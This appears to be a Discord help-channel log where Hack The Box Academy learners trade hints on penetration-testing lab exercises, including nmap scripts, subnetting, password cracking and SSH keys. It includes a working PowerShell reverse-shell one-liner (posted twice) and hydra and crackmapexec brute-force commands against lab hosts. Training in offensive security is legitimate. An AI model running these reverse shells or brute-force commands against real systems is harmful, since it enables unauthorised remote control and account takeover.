Can anyone help me mounting a BitLocker vhd file? It is from the password attacks hard lab. I have already found the password to decrypt the file, but can't get a prompt to put it in.So far I have tried

1. The windows vm that is part of the assignment, but I can't mount it as I need the Admin's password and I feel like that is in the vhd file
2. The parrot box was not able to install the necessary tools to mount it within Linux
3. Cannot find anything that will allow me to mount it on my Mac
4. My AWS Windows VM couldn't recognize the file and chose to not do anything with it
5. My physical Windows computer also has no idea what to do with it. Literally no option to mount it in any way
6. My Kali vm, just like the parrot box, cannot install the tools necessary
   At this point I just want to know what is inside, I don't care how I get it

Is there a way to improve nmap speed over vpn? Running the pwnbox in a browser, nmap performs much faster scans, but I prefer to use a vpn, however it can be a bit annoying sometimes seeing a scan that's estimated to take a few hours, when on the pwnbox it completes in 10 seconds.

you can always tweak with the nmap options

Sure, but running the same scan on the pwnbox is sometimes several hours faster for some reason

Hours? It shouldn't take that long for any scan, unless you're doing a UDP scan.

cause it is directly connected to the HTB network, and as rat suggested unless you're doing a UDP scan shouldn't take that long of course there are other factors to take in consideration

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

Thanks, but that was one of the first things I tried. Everytime I try and get the tools all I get is "failed to fetch http://.kali.org/.../tool-name" it has done that on my kali vm and the parrot box

I used that to make it work. Which tool is coming up with the error?

The very first one "qemu-utils"

That is at least on my kali box. On the parrot box I can get up to "modprobe nbd" where it says "modprobe: ERROR: could not insert 'nbd': Operation not permitted"

Did you run into any issues when you did this? Now I am getting hung up on the command "qemu-nbd -c /dev/nbd0 <PATH_TO_FILE>.vhd"

sudo apt install qemu-utils cryptsetup ntfs-3g-dev -y works fine.

as long as the file exist in your location, it should work.

My new error. Farther than I've gotten previously

#modules message

Open a PS instance as Administrator

lol this is a joke

I CANT BELIEVE THIS

im done

for real this time

I am having trouble with "sudo dislocker /dev/loop0p2 -u(password) -- /media/bitlocker"

When I replace (password) with the password I cracked it then asks me for the user's password. I never gave it a user so where would it be getting that from? And then it says the keys I have given cannot be used for decrypting keys

can someone help me with that?

NSE is nmap script engine

ya i know, but i dont undrastend what do i need to find

The flag

probably use -Sc for scripts

🤯

tried too

do you have any space between the -u and your password? if yes then that's the issue

one of the services is like one of the ports?

omg I needed to put "http://" before the ip for the ffuz module

-sV is a good option for nmap too @carmine trench

i dont know what do i need to look for, like how does the flag looks like

-sV will probe open ports to determine service/version info

the question is asking for a flag in one of the services, maybe something that looks odd

whats your command look like?

i did that, and it doesn't show me the version of port 31337

nmap [target] -sV -p-

you didnt use a script

Services are running on ports.. one of the services contains a flag, you get it using NSE
In order to understand how to use NSE read (again) the NSE section

i dont know which script to use, there is a lot😫

the script you wanna use is also in the module

should start with --script

Why are you even surprised? The protocol is not an optional part of the URL, you probably just got used for your browser to automatically select it for you, but in terminal there is no reason not to specify it when working with a website

I usually get an error at least

ffuz ran like nothing was wrong

I tried both. With the space prompts for the password again, without doesn’t, but the error happens both times. Is it actually pointing it to the file? I’m not understanding how it knows what file as only the command before states the actual file

send a screenshot of the command you run and the error that get

tried to do something and i got this

am i on to something?

hi guys, im doing the windows pe module, and im in the pillaging section. Can someone give me a nudge about the last question ( i have the SAM, SYSTEM and Security, but i dont know why secretdumps doesnt work...)

did you run --script vuln?

Ya

I think

Wait let me check

Um no I dont

I used -sV

Oh wait im dumb

you want that too

I did , this was the result

read the results

it gives you vulnerabilites you should check

there should be more below the screenshot right?

in your screenshot, the "http-slowloris-check:" is a vulnerability

there should be another

http-slowloris-check:
http-dombased-xss:
http-stored-xss:
http-enum:
http-csrf:

hope that makes sense

Hey yall, im working on the new module for NTA, and im not sure what im doing wrong here. The question is this: Inspect the ARP_Poison.pcapng file, part of this module's resources, and submit the total count of ARP requests (opcode 1) that originated from the address 08:00:27:53:0c:ba as your answer. I am using the filter: || arp.opcode == 1 && (eth.src == 08:00:27:53:0c:ba) || and I am getting the result || 507 || from the wireshark statistics page, but that is not the answer?

Blocked out password, but there is no space

Why is Intermediate Network Traffic Analysis easy while Intro to Network Traffic Analysis is medium?

someone at HTB make an oopsie woopsie

shoot me a dm i'll help you troubleshoot

*working fine for me

Yo when did they release this

Earlier Today

Good

the first screenshot is clearly a connection error so the target smb may have crashed try reset your target

and on the second screenshot that user is active but doesn't have rdp (that user is for other services)

yep

for RDP i used hydra

hydra -L username.list -P password.list -f rdp://10.129.6.188 -t 4

yo guys anyhelp with the active subdomain enumeration lab, im on the question where you have to submit the contents of the txt record. i got chatgpt to write me bash script to iterate through the list of domains i got ealier on but i keep getting no txt record found any push in the right direction much appreciated

i think it's the threads

first ask better question next time don't just say i'm on the lab and chat GPT scipt doesn't work, which module and section are you on? what did you try and what faild? and secondly quick reminder that HTB academy modules is paided content which you can't just post on chatGPT or other AI platform

and hint on question do a dns zone transfer and look for ||domain which similar ips||

this is what i asked chatgpt no paid content was posted

no

slowloris attack is to take down the ip

lovely

I was supposed to know that?because they didn’t talk about that in the page

Im so confused with this module like there is bunch of stuff that i need to use to get an answer but they dont mansion it in the module

which module and section are you on?

tell me about it

Basic Toolset i think

that is a path

not a module

Im in the nmap module right now

https://academy.hackthebox.com/module/19/section/108

literally they showed u the website

@carmine trench if you are on the Nmap Scripting Engine section of the nmap module then you and the other guy has completely gone off of track a while back

to check for scripts

??

how

these and the vuln scipt doesn't have anything to do with the section

But how do i know what to search?

spoiler for god sake

well you said it has nothing to do with it

so which is it

no idea how or why you got the file with the vuln scipt

--script vuln lists all the vulnerabilities

But why did you searched http? And not ssh or xss or something like that

.

u sent a ss of http service

Ya but i got much more things too

I sent it because i saw something with dos

then search it

Im lost😭

then read the section again

I read it twice dude and im still lost

Networking is so confusing ong

use --script vuln

what is the sense of tell him run this command

if he doesn't even know what is that for

it identifies vulnerabilities

and shows where the flag is

Idk why but my hints doesn’t works

Hey all, I need a nudge in the below if possible
Module: Password Attacks
Chapter: Password Attacks Lab - Hard
Issue: I'm trying to brute force J using the following commands (in the same time) but it's taking a long time which making me doting that I'm on the wrong track
||crackmapexec winrm IP -u "J" -p mut_password.list --local-auth||
||crackmapexec winrm IP -u "j" -p mut_password.list --local-auth||
||crackmapexec winrm IP-u "J" -p password.list --local-auth||
||crackmapexec winrm IP -u "j" -p password.list --local-auth||

hint try ||RDP||

but is it J or j ?

got j in my note so go for that first

also this should only take 2-3 min max

it doesn't care

using mut ?

noted

yep

noted, will try ||hydra -l j -P mut rdp://IP|| now thanks

although there is a good bit of sevice running on this target the section hint point you to the target web server so that's why you need to use http script

Ohhhh

even though nmap is literally the last tool i would used for a web server but hint try to look for scrip that is for enum first

facts

Got ya

and like the other guy said the vuln script in theory could work but it's just a script that run other script so if you don't even know what a script does there is almost no point of running it just to get the answer

but in your previous screenshot i'm guessing that didn't work

mount ur own vm

u will need it soon or later

hw didnt post the full results

so it's could be that he got the answer all of this time 🤣

without even knowing what he was doing

it's taking a lot of time as well using this command hmmmm

I reached 800 of 94045

hint you are close to the cred

you were right, cheers

nice 👍

@elfin cedar which tools do you use to search for xss, crsf, stored xss enum

also quick note i just help someone with the last part of this lab so if you do need help with that part scroll up a bit 😉

Awesome, thanks again

xsstrike

unless you have -v on i belive it does

I'm cracking on through the teir 0 modules of the academy

im not sure what module your doing but hyrda RDP is a little funny when you start putting a lot of threads on,

I finally got script kiddie

😎

hello everyone, I want to ask about the Attacking Common Applications Module.

In the PRTG Network Monitor section's questions it is said that I can get a reverse shell, I've tried different ways to obtain one but i couldn't

i used this powershell one liner:
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.149',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
But when i get the rev shell it isn't responsive

and then it just disconnects.

I thought abt it being terminated by the App itself, which might be viable, but it doesn't make a lot of sense

Have you tried one from here: https://revshells.com/

yes, it didn't work at all

i checked the spelling and everything

Is anyone here doing the new Network Traffic module?

didn't do that one yet

i will try to make a rev shell file and download it on the machine, I'll see what turns up

Not yet. I'm making very slow progress in the SOC Analyst path. 🙈

i got it, i made a metasploit reverse shell, uploaded the file on the target, and ran it.

"Submit the broadcast address of the following CIDR: 10.200.20.0/27"

Super confused on how the answer is 31. Anyone able to ELI5?

reread the section 2 times now and it's just not clicking

if u calculate the range of this subnet, you will get the following:
Network Address: 10.200.20.0
Hosts: 10.200.20.1 - 10.200.20.30
BC Address: 10.200.20.31
Every subnet contains 32 hosts, subtracting both the network address and the BC u get 30 usable address.
The BC address is a special type of address, so it's reserved in the last usable address in the subnet.

a /27 has 32 addresses, so if you find the network address of that, you can then work out the broadcast address being the last available IP address.
in this instance the network is 10.200.20.0, with the usable address 20.1-20.30 with the broadcast on 31

I would have a look at how networks and subnets work using XOR online somewhere and then once you have got your head round whats happening theres lots of cheat sheets online to refer to quicklu

Think my brain is just too worn out to continue learning today... even that simple explanation is just beyond my comprehension right now.

Thank you for explaining, I'll come back tomorrow and try to see if my brain isn't melted ice cream then.

Hy all, quick question on the SQL Operators lab in the SQL injection fundamentals section, currently banging my head against the wall on trying to craft a query that does not include 'engineer' in the title at all

Thought i had it, but titles that still include engineer are returning, but titles with only engineer in it are excluded. Any sort of nudge one can provide?

Here is an example query ive tried but hasn't worked:

I have the same issues

Hello everybody

Dumb question I'm sure but please humor me.

So... if I'm understanding subnets correctly, a /27 has 32 available because it's basically 128+64+32 = 224, then 256 total - 224 = 32 available... so why are the usable addresses .1-.30 instead of .224-.254? Is it simply because the extra addresses are just removed entirely or are they reserved elsewhere?

disregard, % was a game changer

can anyone help me with that powershell oneliner ?

You can have multiple subnets within the range, so you can have 0-31 32-63 etc. In this case the host is .0 meaning the addresses are 0-31. The easiest way to unsterdand this is to find some video that explains classes subnetting on YouTube. Then you'll see how the maths side of it works

DM me

Ah. So it just begins at the host... duh. Right. Sorry, my brain really is just trashed right now lol

In the final octet the subnet is: 11100000. So using xor you can have a host of:
00000000
00100000
01000000
01100000 etc.
Or 0, 32,64,96 etc....
The broadcast is always going to be the top address in the 32 addresses

Yeah, makes sense now. For some reason I was just overlooking the obvious there lol

for those who are searching, I used this powershell oneliner with no error: $client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

thx i dont know so much about Discord

The question specifies two conditions to meet, one is that the employee number is greater than 10000 or their title doesn't contain engineer

so crafting the first condition will be a simple greater than operator, then comes the OR part, then you craft the doesn't contain engineer part.
It's mentioned in the previous section how to search for a specific word using the LIKE clause.
check that again and if u didn't figure it out I'll be happy to assist

didn't notice this one, my bad

guys, what is the best module to start with if im new to cyber?
(i wish i asked it earlier because i already start with basic toolset, but i still want know what my next module will be)

hello everyone, quick question for those who finished the attacking common apps module, im stuck at the gitlab Enum section question, where they want me to enumerate the version number, i found the version number througout the help page, but it's incorrect, if anyone can nudge me in the right direction it would be appreciated

try to go with the information security foundations path at first, as it gives u a grasp over common concepts

then from there im pretty sure you'll figure ur way around

nvm i found it while digging around in a registered account.

i think you're better off asking on #boxes

that happened as well....

Aye Aye, I created a post in the community-help

oke oke, goodluck

Anybody can tell me why I can't find the 0000000000003000 | MAP | -RW-- in "Attacking Thick Client Applications"? It's driving me nuts 💀

@slender shoal What do you mean? Isn't this as they explain it 🥺

hey

i'm doing the passord attacks. Module Attacking Active Directory & NTDS.dit

i'm given an IP but no creds to login to enumerate the service

any idea what i'm suppose to do

hello anyone can let me know if the cracked Kira's passwd changed?, cuz I'm trying to connect as described on the question in Protected files at Password Attack module?

The name is in the title

ok.

they didn't teach in the module how to attack more so, they told me how to retrive NTDS.dit to crack the hashes offline

I got web shell working, and can traverse directories. Looking from c: on through the hiearchies, I do not see anything with flag in it. Do I need to do a reverse shell or can I traverse, and just missing the path?

But that's not the question being asked. They are literally just asking you the name of the file that stores the password hashes for the domain.... which is stated in the reading material, about half way down the page.

I did it but, the weird thing is I found the same password as previous.... trying 1 + time with other dictionary

Combination of both iirc

hello everyone, I have a question regarding the Attacking Common Apps module, Section Attacking CGI Apps - ShellShock.
In the section it mentions that the User-Agent Header is vulnerable to command injection, but it doesn't show how did we get to that or how to enumerate it effectively, if anyone has a blog or a guide or anything that might help with understanding how we got to this.

Just follow the examples, it works.

Hi @fathom pendant. Regarding the question in Attacking Common Services easy lab "You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer." I tried the following:

1. Used the smtp-user-enum tool and found a username starting with f.
2. found what appeared to be default credentials, first tried to login with them using mysql but was not successful an error appeared citing that the password field was empty.
3. tried brute forcing each username found with the password list provided in the resources section on the ftp and mysql ports but this was also unsuccessful.

I saw the mysql reverse shell discussion and correctly if I am wrong. I need to be authenticated before attempting this? or does it work straight from the url bar? Any hints would be appreciated 🙂

yes ik that it works, but i wanna know how.

I used ncrack to get the un/pw. Look throgh the forums for the web shell parts as well as the sql module. I am at the web shell part right now, trying to traverse to find the flag, but not sure that's one way to do it, or if I need to do a reverse shell. I think I am almost at the finish with this module.

Do your own research then 🙂

i was asking if someonoe does know a blog or a guide, it doesn't mean im not doing my own research, uk u could've just ignored my question and went on :)

quick update, just found the flag. if you have questions as to how I approached it you can DM me. Feels like there might be a couple ways to get the flag.

does anyone have any expienence with kubeletctl ? i get this error when running it. Error: unknown flag: --certificate-authority

the command im running is:

kubeletctl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 pods

Hello. I am working on the Cracking Wireless (WPA/WPA2) Handshakes with Hashcat module. My problem is with Question 1: Perform MIC cracking using the attached .cap file. I have followed the instructions in the module. I used cap2hccapx.bin to create a file with the handshakes called mic_to_crack.hccapx. I used hashcat, with -m 22000, to crack it. But hashcat always exhausts.

Any tips on what I'm doing wrong? I'm using pwnbox, not kali.

hashcat version is 6.1.1.

my apologies, u were right..!!!

i remember this question i think it was different -m number the old depricated one worked for me i can look it up for you

crack Kira passwd

I tried the old -m, 2500, and it still got exhausted.

yea i think i used that one and --deprecated-check-disable

Interesting, I'll try that, thank you.

i have a bad memory but i remember this cuz after i figured it out i told support about it that it didn't working unless i used that one

Obtain credentials first via smtp then figure out the rest

thenas, did you use --deprecated-check-disable on hashcat, or on cap2hccapx.bin?

Hashcat with -m 2500

Thank you for the tip. Unfortunately, it is still not working for me.

Dm me mate

as i said i have very bad memory but we can figure it out hopefully i have the message i sent to support

hello i am on WEB ATTACKS module on Blind Data Exfiltration
room trying to use XXEinjector but its not working with me

ruby XXEinjector.rb --host=127.0.0.1 --httpport=8080 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter

keep giving me

[-] Specified TCP ports already in use.

i am using python http.server to listen can someone help me tell me what i am doing wrong

Code lines are triple backticks, not single quotes BTW (`)

Like this

my bad

It's alright

quick question

how can i freeze the memory map in x64dbg, the memory map keeps changing and i couldn't figure out how to catch the memory to dump it.

if anyone has any experience with it it'll be appreaciated

appreciated**

I'm stuck at it unable to dump the memory.

this is rly frustrating ngl

hello I would appreciate any hint to start hard lab of attacking common services, I tried to brute force with different list but no result, any hint?

I feel so stupid

What am I missing?

when I try to ssh I get the error: Permission denied (publickey)

I have the password but why isn't is prompting me for it?

This means that you need the rsa key

It's not an error, just a message

hey!

but even for this??

https://academy.hackthebox.com/module/57/section/491

hi

in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

is that the full error message ?

You are meant to enumerate other services to get the rsa key

in the login brute forcing module??

ssh b.gates@94.237.56.76
The authenticity of host '94.237.56.76 (94.237.56.76)' can't be established.
ED25519 key fingerprint is SHA256:j+yt/5KEcd5ONU/344Wjh/R90Vl8/QvaNaLalC7+48k.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '94.237.56.76' (ED25519) to the list of known hosts.
b.gates@94.237.56.76: Permission denied (publickey).

you need to get the id.rsa both private and public and change mode to be excutable

it will then work

once you get these keys, do this

but the module doesnt even mention this

I know

omg

its rigged man

i have the same problem in the password attacks moduke

not everything is available

anyone have a small hint concerning this question: in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

The modules expect some familiarity with linux environments - you should already have a grasp of the fundamentals before starting.

yeah I remember doing the same thing from a previous module

respectful 👍

so whenever you ssh into something, you need more than just a password everytime?

I will have to go back and redo the ssh module to refresh, I took like 2 weeks off I was losing my mind

when you have id_rsa you can specify in the ssh command with -i and try with root username

anyone have a small hint concerning this question: in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

ssh has more than one method of autentication

anyone have a small hint concerning this question: in password attacks module, in the medium lab section, i can't reach the root although i used the linpease.sh, could you hint me because i think there is no information in the whole module to learn that especially for beginners

😆

my message sir

when you have id_rsa you can specify in the ssh command with -i and try with root username

if you have a valid private key...

yea, i have a key for the user jason

on;y

only

you can use it for root...

you mean like this ssh root@ip -i id_rsa

yeah

remember id_rsa must have 600 permision

wait seconds